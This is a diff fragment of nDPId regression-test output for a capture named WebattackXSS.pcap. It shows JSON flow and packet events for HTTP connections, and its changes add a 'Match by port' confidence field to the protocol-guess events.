+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347779333,"flow_last_seen":1499347784836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347780605,"flow_last_seen":1499347785836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347783176,"flow_last_seen":1499347788836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347784519,"flow_last_seen":1499347789837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347906722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347908253,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347908253,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33956,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1499347908253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347908253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XLdAAD4GaRmsEAABwKgKMoSkAFDBACLDAAAAAKACchB2mwAAAgQFtAQCCAoBPH50AAAAAAEDAwc="}
@@ -3188,15 +3188,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347914710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oQ5AAD4GJMKsEAABwKgKMoToAFDafCXMAAAAAKACchBThAAAAgQFtAQCCAoBPITCAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7869,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":2,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347914710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhOgBH2BK2nwlzaAScSCY3AAAAgQFtAQCCAoD5lY3ATyEwgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":3,"flow_last_seen":1499347914711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347914711,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oQ9AAD4GJMmsEAABwKgKMoToAFDafCXNAR9gS4AQAOU34wAAAQEICgE8hMMD5lY3"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347917322,"flow_last_seen":1499347917322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347917322,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1499347917322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347917322,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CqdAAD4GuymsEAABwKgKMoUCAFC+4o3oAAAAAKACchAEWwAAAgQFtAQCCAoBPIdPAAAAAAEDAwc="}
@@ -3222,15 +3222,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347926328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y4hAAD4GYkisEAABwKgKMoVgAFAOjvOTAAAAAKACchBF2gAAAgQFtAQCCAoBPJAbAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347926328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhWB82qzsDo7zlKAScSC3fAAAAgQFtAQCCAoD5mGPATyQGwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":3,"flow_last_seen":1499347926329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347926329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y4lAAD4GYk+sEAABwKgKMoVgAFAOjvOUfNqs7YAQAOVWhAAAAQEICgE8kBsD5mGP"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
